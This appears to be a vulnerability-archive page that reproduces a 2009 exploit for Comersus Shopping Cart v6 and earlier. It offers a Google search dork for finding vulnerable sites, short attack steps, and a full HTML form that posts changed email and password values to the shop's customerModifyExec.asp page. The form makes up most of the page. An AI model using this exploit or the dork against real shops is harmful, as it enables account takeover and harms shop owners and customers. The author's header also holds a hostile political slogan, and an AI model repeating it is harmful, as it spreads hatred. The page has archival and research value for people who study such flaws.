Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21135
HistoryJan 13, 2009 - 12:00 a.m.

Comersus Shopping Cart <= v6 Remote User Pass Exploit

2009-01-1300:00:00
vulners.com
146

Title : Comersus Shopping Cart <= v6 Remote User Pass Exploit

Author : "ajann" from Turkey

Contact : :(

S.Page : http://www.comersus.com/

$$ : Free

Dork : Powered by Comersus v6 Shopping Cart

DorkEx :

http://www.google.com.tr/search?hl=tr&amp;q=Powered+by+Comersus+v6+Shopping+Cart&amp;btnG=Ara&amp;meta=

KAHROLSUN ISRAEL

-Register Site
-Login
-Open Exploit
-Edit: User Email , User Password
-Submit Form


<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp&quot;&gt;
<table width="421" border="0">
<tr>

&lt;/tr&gt;
&lt;tr&gt; 
  &lt;td width=&quot;168&quot;&gt;Name&lt;/td&gt;
  &lt;td width=&quot;220&quot;&gt;      
    &lt;input type=text name=customerName value=&quot;test&quot;&gt;
  &lt;/td&gt;
&lt;/tr&gt;    
&lt;tr&gt; 
  &lt;td width=&quot;168&quot;&gt;Last Name&lt;/td&gt;
  &lt;td width=&quot;220&quot;&gt;      
    &lt;input type=text name=lastName value=&quot;test&quot;&gt;
  &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt; 
  &lt;td width=&quot;168&quot;&gt;Company&lt;/td&gt;
  &lt;td width=&quot;220&quot;&gt;      
    &lt;input type=text name=customerCompany value=&quot;test&quot;&gt;
  &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt; 
  &lt;td width=&quot;168&quot;&gt;Phone&lt;/td&gt;
  &lt;td width=&quot;220&quot;&gt;        
   &lt;input type=text name=phone value=&quot;123456789&quot;&gt;
  &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt; 
  &lt;td width=&quot;168&quot;&gt;&lt;strong&gt;Email&lt;/strong&gt;&lt;/td&gt;
  &lt;td width=&quot;220&quot;&gt;   

    &lt;input type=&quot;text&quot; name=&quot;email&quot; value=&quot;Please Add Mail&quot;&gt; 
    Edit
  &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt; 
  &lt;td width=&quot;168&quot;&gt;&lt;strong&gt;Password&lt;/strong&gt;&lt;/td&gt;
  &lt;td width=&quot;220&quot;&gt;         
    &lt;input type=text name=password value=&quot;Please Add Pass&quot;&gt; 
    Edit
  &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt; 
  &lt;td width=&quot;168&quot;&gt;Address&lt;/td&gt;
  &lt;td width=&quot;220&quot;&gt;         
    &lt;input type=text name=address value=&quot;test&quot;&gt;
  &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt; 
  &lt;td width=&quot;168&quot;&gt;Zip&lt;/td&gt;
  &lt;td width=&quot;220&quot;&gt;         
    &lt;input type=text name=zip value=&quot;08050&quot;&gt;
  &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt; 
  &lt;td width=&quot;168&quot;&gt;State&lt;/td&gt;
  &lt;td width=&quot;220&quot;&gt;         
    
  &lt;SELECT name=stateCode size=1&gt;
  &lt;OPTION value=&quot;&quot;&gt;Select the state
    &lt;option value=&quot;1&quot;&gt;Please Type County below
  &lt;/OPTION&gt;
  &lt;/SELECT&gt;
  &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt; 
  &lt;td width=&quot;168&quot;&gt;Non listed state&lt;/td&gt;
  &lt;td width=&quot;220&quot;&gt;         
   &lt;input type=text name=state value=&quot;&quot;&gt;
  &lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt; 
  &lt;td width=&quot;168&quot;&gt;City&lt;/td&gt;
  &lt;td width=&quot;220&quot;&gt;         
    &lt;input type=text name=city value=&quot;test&quot;&gt;
  &lt;/td&gt;
&lt;/tr&gt;    
&lt;tr&gt; 
  &lt;td width=&quot;168&quot;&gt;Country&lt;/td&gt;
  &lt;td width=&quot;220&quot;&gt;                 
    
  &lt;SELECT name=countryCode&gt;
  &lt;OPTION value=&quot;&quot;&gt;Select the country
    &lt;option value=&quot;AF&quot; selected&gt;AFGHANISTAN
  &lt;/OPTION&gt;
  &lt;/SELECT&gt;       
  &lt;/td&gt;
&lt;/tr&gt;



&lt;tr&gt; 
  &lt;td width=&quot;168&quot;&gt;&amp;nbsp;&lt;/td&gt;
  &lt;td width=&quot;220&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt; 
  &lt;td colspan=&quot;2&quot;&gt;        
      &lt;input type=&quot;submit&quot; name=&quot;Modify&quot; value=&quot;Modify&quot;&gt;                            
  &lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;

</form>